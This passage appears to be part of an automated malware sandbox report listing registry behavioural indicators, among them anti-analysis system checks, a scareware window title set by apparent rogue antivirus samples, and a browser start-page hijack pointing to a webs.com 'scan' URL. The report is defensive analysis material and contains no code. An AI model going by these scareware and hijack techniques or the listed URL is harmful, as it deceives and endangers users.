| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Security Central\Security Central.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Security Central\Security Central.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\AppData\\Roaming\\1.gif" | C:\Users\Admin\Desktop\[email protected] | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Desktop\General | C:\Users\Admin\Desktop\[email protected] | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Malwarebytes.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" | C:\Users\Admin\Desktop\[email protected] | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Desktop\[email protected] | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main | \??\c:\windows\antivirus-platinum.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Security Central\Security Central.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Security Central\Security Central.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" | \??\c:\windows\antivirus-platinum.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1711366280" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\23 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"/NWytbvqlmwWcvZRUZ6XMvLSSIJCtYEsMHi76l2vBp8=\"" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|12" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133557949509966320" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 = 4d6963726f736f66742e4f66666963652e566973696f2e484f50657266496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e57686174734e65772e454353446174614c6f61646564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d31304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314742416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d35304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d354d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d5265616c6c79426967416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e456e61626c655061747465726e73496e41746e74786e64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e52616973655569614175746f436f72726563744576656e7457697468456e74697265576f7264222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d617022203a207b2022464347726f75704d61705f3122203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657231222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333230323b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657232222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838323936373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657233222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333231313b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657234222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373934313932373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657235222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383732353732343238343635343239363b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b6564477261706869637341646170746572436f756e74222c20225622203a2022696e7433325f747c3522207d205d2c2022464347726f75704d61705f3222203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e476c6f62616c5265736f75726365496e666f4361636865456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e53686f756c644d69677261746546726f6d4f72617069222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d61705f3322203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e437a656368456e746572707269736547726f757032222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4f7074696f6e4f766572726964652e6373222c20225622203a20227374643a3a77737472696e677c4772616d6d617220616e6420726566696e656d656e74733a3a53657875616c206f7269656e746174696f6e20626961733d3022207d205d2c2022464347726f75704d61705f3422203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e42697a426172222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173426f6f742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173446f63756d656e7452656164792d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173466c6f6f64676174652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6963656e73696e674469616c6f6752656e65772d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c4f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c53617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f444253617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e6544726976654f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e65447269766553617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163654f70656e2d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163655361766541732d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d466c6f6f6447617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d496e41707050757263686173652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f75745370616365222c20225622203a2022626f6f6c7c3022207d205d207d207d | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
